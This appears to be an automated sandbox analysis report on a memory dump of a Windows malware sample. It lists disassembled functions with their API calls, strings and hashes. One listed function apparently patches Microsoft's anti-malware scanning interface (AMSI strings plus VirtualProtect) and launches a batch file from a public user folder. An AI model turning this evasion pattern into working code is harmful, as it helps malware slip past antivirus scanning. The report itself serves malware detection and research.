Opcode ID: 00cf8a23671bc4cc9aac93a7ced74bf6265e22d28a61591487b9a3d176c56e18
Instruction ID: d4b59f12d9c7803cb154706d1d529d0822deace9b7d7ad1baaf31c21249038cb
Opcode Fuzzy Hash: 00cf8a23671bc4cc9aac93a7ced74bf6265e22d28a61591487b9a3d176c56e18
Instruction Fuzzy Hash: 8E012175A44208BBEB00EBE0DC45FEDB3ADDB48704F904472A500F6690EA74AF048A74

Uniqueness

Uniqueness Score: -1.00%

Function 02D2EFA4 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02D2EF48: CLSIDFromProgID.OLE32(00000000,?,00000000,02D2EF95,?,?,?,00000000), ref: 02D2EF75

CoCreateInstance.OLE32(?,00000000,00000005,02D2F088,00000000,00000000,02D2F007,?,00000000,02D2F077), ref: 02D2EFF3

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 7cc0fe62b69d153e563f73790f6de8033ff221c115dccad2c8107a9d4901b21c
Instruction ID: 99492e90dcb316cb04e9437cbaba153319a3bb10d06b0d5654c7e8865812d9f7
Opcode Fuzzy Hash: 7cc0fe62b69d153e563f73790f6de8033ff221c115dccad2c8107a9d4901b21c
Instruction Fuzzy Hash: B001F7306087446EF715DF60ED12D6E7BBCD769B10F620875F801D2B80E6345D08C970

Uniqueness

Uniqueness Score: -1.00%

Function 02D795F8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,02D7967E), ref: 02D79612

Part of subcall function 02D573CC: GetCurrentProcessId.KERNEL32(?,00000000,02D57544), ref: 02D573ED
Part of subcall function 02D573CC: GlobalAddAtomA.KERNEL32(00000000), ref: 02D57420
Part of subcall function 02D573CC: GetCurrentThreadId.KERNEL32 ref: 02D5743B
Part of subcall function 02D573CC: GlobalAddAtomA.KERNEL32(00000000), ref: 02D57471
Part of subcall function 02D573CC: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,02D57544), ref: 02D57487
Part of subcall function 02D573CC: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02D57544), ref: 02D5750B
Part of subcall function 02D573CC: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02D5751C

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
String ID:
API String ID: 3557136124-0
Opcode ID: bd31c4c3b8e3dbd12983870586278c99e9890870e8c7f9e44dc8abbfd6a4565a
Instruction ID: 59fc549c44defb7d530eef9c0d24e6520c483a334c38a6113ea41160feaf5e00
Opcode Fuzzy Hash: bd31c4c3b8e3dbd12983870586278c99e9890870e8c7f9e44dc8abbfd6a4565a
Instruction Fuzzy Hash: E4F0FF396846908BE322EF25FD55819B3AAFF653447D55935E40083B14E6389C35CEB4

Uniqueness

Uniqueness Score: -1.00%

Function 02D573CC Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(?,00000000,02D57544), ref: 02D573ED
GlobalAddAtomA.KERNEL32(00000000), ref: 02D57420
GetCurrentThreadId.KERNEL32 ref: 02D5743B
GlobalAddAtomA.KERNEL32(00000000), ref: 02D57471
RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,02D57544), ref: 02D57487

Part of subcall function 02D27B54: InitializeCriticalSection.KERNEL32(02D255C0,?,?,02D5749D,00000000,00000000,?,?,00000000,02D57544), ref: 02D27B73

Part of subcall function 02D56FD4: SetErrorMode.KERNEL32(00008000), ref: 02D56FED
Part of subcall function 02D56FD4: GetModuleHandleA.KERNEL32(USER32,00000000,02D5713A,?,00008000), ref: 02D57011
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 02D5701E
Part of subcall function 02D56FD4: LoadLibraryA.KERNEL32(imm32.dll,00000000,02D5713A,?,00008000), ref: 02D5703A
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 02D5705C
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02D57071
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02D57086
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 02D5709B
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02D570B0
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02D570C5
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 02D570DA
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 02D570EF
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 02D57104
Part of subcall function 02D56FD4: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 02D57119
Part of subcall function 02D56FD4: SetErrorMode.KERNEL32(?,02D57141,00008000), ref: 02D57134

Part of subcall function 02D614E4: GetKeyboardLayout.USER32(00000000), ref: 02D61529
Part of subcall function 02D614E4: GetDC.USER32(00000000), ref: 02D6157E
Part of subcall function 02D614E4: GetDeviceCaps.GDI32(00000000,0000005A), ref: 02D61588
Part of subcall function 02D614E4: ReleaseDC.USER32(00000000,00000000), ref: 02D61593

Part of subcall function 02D626EC: LoadIconA.USER32(00000000,MAINICON), ref: 02D627E3
Part of subcall function 02D626EC: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,02D574DC,00000000,00000000,?,?,00000000,02D57544), ref: 02D62815
Part of subcall function 02D626EC: OemToCharA.USER32(?,?), ref: 02D62828
Part of subcall function 02D626EC: CharNextA.USER32(?,00000000,?,00000100,?,?,?,02D574DC,00000000,00000000,?,?,00000000,02D57544), ref: 02D62867
Part of subcall function 02D626EC: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,02D574DC,00000000,00000000,?,?,00000000,02D57544), ref: 02D6286D

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02D57544), ref: 02D5750B
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02D5751C

Strings

Delphi%.8X, xrefs: 02D573FE
USER32, xrefs: 02D57506
ControlOfs%.8X%.8X, xrefs: 02D5744F
AnimateWindow, xrefs: 02D57516

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 1515865724-1126952177
Opcode ID: 94a14b017ad49ef31437dd6b362221c181577c218cda79f1de1c88fbec018e68
Instruction ID: 1e3ce2abb5c866d5175a9c2894af977d724e714357d19c2f324716c4a1cf5593
Opcode Fuzzy Hash: 94a14b017ad49ef31437dd6b362221c181577c218cda79f1de1c88fbec018e68
Instruction Fuzzy Hash: 16413A74A402899FDB00FFA8E89099EB7FAEB18300F154865E805D7B50DB74AD14CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D6BCA4 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D2FD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD78
Part of subcall function 02D2FD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD86
Part of subcall function 02D2FD40: GetProcAddress.KERNEL32(74B00000,00000000), ref: 02D2FD9F
Part of subcall function 02D2FD40: VirtualProtect.KERNEL32(02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDBA
Part of subcall function 02D2FD40: GetCurrentProcess.KERNEL32(00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDD7
Part of subcall function 02D2FD40: FlushInstructionCache.KERNEL32(00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDDD
Part of subcall function 02D2FD40: FreeLibrary.KERNEL32(74B00000,00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDE8

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02EA1BB8,02EA1BFC,ScanString,02DAD350,02D6C2DC,OpenSession,02DAD350), ref: 02D6C00B
WaitForSingleObject.KERNEL32(000008A8,000000FF,ScanString,02DAD350,02D6C2DC,OpenSession,02DAD350,02D6C2DC,ScanString,02DAD350,02D6C2DC,OpenSession,02DAD350,02D6C2DC,UacScan,02DAD350), ref: 02D6C257
CloseHandle.KERNEL32(000008A8,000008A8,000000FF,ScanString,02DAD350,02D6C2DC,OpenSession,02DAD350,02D6C2DC,ScanString,02DAD350,02D6C2DC,OpenSession,02DAD350,02D6C2DC,UacScan), ref: 02D6C262
CloseHandle.KERNEL32(000008A0,000008A8,000008A8,000000FF,ScanString,02DAD350,02D6C2DC,OpenSession,02DAD350,02D6C2DC,ScanString,02DAD350,02D6C2DC,OpenSession,02DAD350,02D6C2DC), ref: 02D6C26D

Strings

OpenSession, xrefs: 02D6BD36, 02D6BEDA, 02D6C088, 02D6C174
UacScan, xrefs: 02D6BCDD, 02D6BE81, 02D6C017
ScanString, xrefs: 02D6BD8F, 02D6BF33, 02D6C0F9, 02D6C1E5
Amsi, xrefs: 02D6BE49
AmsiOpenSession, xrefs: 02D6BE38
*"C:\Users\Public\Libraries\KyvoykbdO.bat" , xrefs: 02D6BE15, 02D6BFD5

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Handle$CloseLibraryProcess$AddressCacheCreateCurrentFlushFreeInstructionLoadModuleObjectProcProtectSingleUserVirtualWait
String ID: *"C:\Users\Public\Libraries\KyvoykbdO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
API String ID: 2745437331-3919436100
Opcode ID: b0b9da45b26f35fb530569f993059f0658cf3d46639193c2051391b3e85e9b8f
Instruction ID: 6108dd5e0b285bb7b847b9aaeb1324828d453584f485ff266aec5be20ca07460
Opcode Fuzzy Hash: b0b9da45b26f35fb530569f993059f0658cf3d46639193c2051391b3e85e9b8f
Instruction Fuzzy Hash: 01F11E34B51119ABDB10FBE4E884FDEB3BAEF48700F518066E444ABB54DA30AE458F65

Uniqueness

Uniqueness Score: -1.00%

Function 02D626EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(00000000,MAINICON), ref: 02D627E3
GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,02D574DC,00000000,00000000,?,?,00000000,02D57544), ref: 02D62815
OemToCharA.USER32(?,?), ref: 02D62828
CharNextA.USER32(?,00000000,?,00000100,?,?,?,02D574DC,00000000,00000000,?,?,00000000,02D57544), ref: 02D62867
CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,02D574DC,00000000,00000000,?,?,00000000,02D57544), ref: 02D6286D

Part of subcall function 02D62A40: GetClassInfoA.USER32(02D10000,02D626DC,?), ref: 02D62A9F
Part of subcall function 02D62A40: RegisterClassA.USER32(02D7B650), ref: 02D62AB7
Part of subcall function 02D62A40: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 02D62B53
Part of subcall function 02D62A40: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 02D62B75

Strings

MAINICON, xrefs: 02D627D6

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
String ID: MAINICON
API String ID: 2763768735-2283262055
Opcode ID: dc1edd099a4cdc2c12f77f85f08a8ab9432278bbb3de4973f6e0f4a0373590f0
Instruction ID: 433444f69bfdea4cce59cf758ee4753bc4c13b0a7a6a5c54b4fdb61009fad742
Opcode Fuzzy Hash: dc1edd099a4cdc2c12f77f85f08a8ab9432278bbb3de4973f6e0f4a0373590f0
Instruction Fuzzy Hash: 5C513C70A042849FDB50EF28D888B967BE6AB15304F4845F5DC48CF356D7B69D88CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02D2FD40 Relevance: 10.6, APIs: 7, Instructions: 60
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD78
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD86
GetProcAddress.KERNEL32(74B00000,00000000), ref: 02D2FD9F
VirtualProtect.KERNEL32(02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDBA
GetCurrentProcess.KERNEL32(00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDD7
FlushInstructionCache.KERNEL32(00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDDD
FreeLibrary.KERNEL32(74B00000,00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDE8

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Library$AddressCacheCurrentFlushFreeHandleInstructionLoadModuleProcProcessProtectVirtual
String ID:
API String ID: 3654590073-0
Opcode ID: ccf89812e9f6ca9e535604a3899e2e04061303d7581ef1a8e25a584d002dfa8e
Instruction ID: 07812c7969b30edd5d1a9df7de7ac4b23b4b8ac4e42769a77f4dee71dd6af917
Opcode Fuzzy Hash: ccf89812e9f6ca9e535604a3899e2e04061303d7581ef1a8e25a584d002dfa8e
Instruction Fuzzy Hash: DE114870A44304BFEB10FBA4ED12F9E77AFEB04700F144864A104A7F91DA75AD418EB8

Uniqueness

Uniqueness Score: -1.00%

Function 02D117C0 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02D1209C), ref: 02D1186C
Sleep.KERNEL32(0000000A,00000000,?,02D1209C), ref: 02D11882

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8f24c75544353eeede067b1ef9b91d839884a0c331121e26a4816d671c0d487d
Instruction ID: 5ac4deae4330423891eb0a6a71d4823f3304d171d6420030050b54482bb9f6bd
Opcode Fuzzy Hash: 8f24c75544353eeede067b1ef9b91d839884a0c331121e26a4816d671c0d487d
Instruction Fuzzy Hash: 08B14372A00211ABCB15CF28F490766BBF1FB85310F1886AAD65D8BBC5D730DC55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D11B28 Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02D12080), ref: 02D11BB3
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02D12080), ref: 02D11BCD

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 41640802c42ab5e7afa89d54e9f572dbbf93447abb6d829c1e0e4a77872ced35
Instruction ID: 6131e5679c252e6fe0738cebab6b1740239d90bd8417d978316fc3ac7e282a43
Opcode Fuzzy Hash: 41640802c42ab5e7afa89d54e9f572dbbf93447abb6d829c1e0e4a77872ced35
Instruction Fuzzy Hash: 6251D271601300AFDB158F28E984B26BBE1EF45314F1882AED6488BB95D770DD44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D37650 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 02D37676

Part of subcall function 02D3760C: GetDC.USER32(00000000), ref: 02D37615
Part of subcall function 02D3760C: SelectObject.GDI32(00000000,058A00B4), ref: 02D37627
Part of subcall function 02D3760C: GetTextMetricsA.GDI32(00000000), ref: 02D37632
Part of subcall function 02D3760C: ReleaseDC.USER32(00000000,00000000), ref: 02D37643

Strings

Tahoma, xrefs: 02D37698
MS Shell Dlg 2, xrefs: 02D376E0
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 02D376CC

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: MetricsObjectReleaseSelectText
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
API String ID: 2013942131-1011973972
Opcode ID: b6bdec4185ed17ba672d44d21894d3e7e9439f41656b015b745051537bf0f29a
Instruction ID: 20908a0aa8b36f4ab6048ce3b3e83da8c906baab32b74cd064a3c66d887ec9cb
Opcode Fuzzy Hash: b6bdec4185ed17ba672d44d21894d3e7e9439f41656b015b745051537bf0f29a
Instruction Fuzzy Hash: E71191F1A40A48AFF783DB68DD6095DB7FAEB4A700F914460E80197B10D7319E12CF20

Uniqueness

Uniqueness Score: -1.00%

Function 02D2EA48 Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(02D10000,02D2EA38,?), ref: 02D2EA69
UnregisterClassA.USER32(02D2EA38,02D10000), ref: 02D2EA92
RegisterClassA.USER32(02D7AAF8), ref: 02D2EA9C
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 02D2EAE7

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: d59d26b1b421fe007a5615f72df960925bdca55145cbd4df3d20a6d671cdb4d6
Instruction ID: c9c6dbb89512e37de4e726b373f8958f12ed30c1b94726528264eb858c29fbc3
Opcode Fuzzy Hash: d59d26b1b421fe007a5615f72df960925bdca55145cbd4df3d20a6d671cdb4d6
Instruction Fuzzy Hash: C4016171A841107BDA00EB98EC80E9E779EF719318F104511B954E7390D735ED59CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D302FC Relevance: 4.6, APIs: 3, Instructions: 132registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,02D30496), ref: 02D30368
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,02D30496), ref: 02D303D3
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 02D30438

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 48d1dc9772340f5041268d797c211b320f4a8eb1d33b70067a141fe738f2c1db
Instruction ID: 49a30f277bba7634bd534f6f6c190ecaf155cf538758ba4efe03d618eac3d2d9
Opcode Fuzzy Hash: 48d1dc9772340f5041268d797c211b320f4a8eb1d33b70067a141fe738f2c1db
Instruction Fuzzy Hash: E041A034A04308BFEB12EBA0D941B9EB7FAEF04305F148469E845A3781DB759F05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D29CB0 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D29DF8,?,?,02D25B78,00000001), ref: 02D29D0C
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D29DF8,?,?,02D25B78,00000001), ref: 02D29D3A

Part of subcall function 02D18CF0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02D25B78,02D29D7A,00000000,02D29DF8,?,?,02D25B78), ref: 02D18D3E

Part of subcall function 02D18F2C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02D25B78,02D29D95,00000000,02D29DF8,?,?,02D25B78,00000001), ref: 02D18F4B

GetLastError.KERNEL32(00000000,02D29DF8,?,?,02D25B78,00000001), ref: 02D29D9F

Part of subcall function 02D1B888: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02D1D5F5,00000000,02D1D64F), ref: 02D1B8A7

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: b76739cf6db59ada35af05129732f36a76aa575077e560548586b48c9367003c
Instruction ID: f03f881d9e1c35e26caa5dc58f280a294ee6d8bebd3cf1721bbdcfc056428471
Opcode Fuzzy Hash: b76739cf6db59ada35af05129732f36a76aa575077e560548586b48c9367003c
Instruction Fuzzy Hash: D5316030A40618AFDB00EFA8D991BDEB7F6EF18714F608065E504A7780D775AD098FB5

Uniqueness

Uniqueness Score: -1.00%

Function 02D6C7A8 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02EA1D0C), ref: 02D6C7EC
RegSetValueExA.ADVAPI32(000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,02D6C857), ref: 02D6C824
RegCloseKey.ADVAPI32(000008B4,000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,02D6C857), ref: 02D6C82F

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: dd88de03a0208b9d79f5b169e2ccdcf2aa2c2d97fef1d3085f3893b4d1aa6587
Instruction ID: 1492d1363c68cda5c4ee206fe25f388bef57a0349b518397e5e0c76b0eb1198a
Opcode Fuzzy Hash: dd88de03a0208b9d79f5b169e2ccdcf2aa2c2d97fef1d3085f3893b4d1aa6587
Instruction Fuzzy Hash: D8112B74640208BFEB00EFA9EC8195D7BEEEB09341F514465B405DBB50D770AE418AA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D1F6E0 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

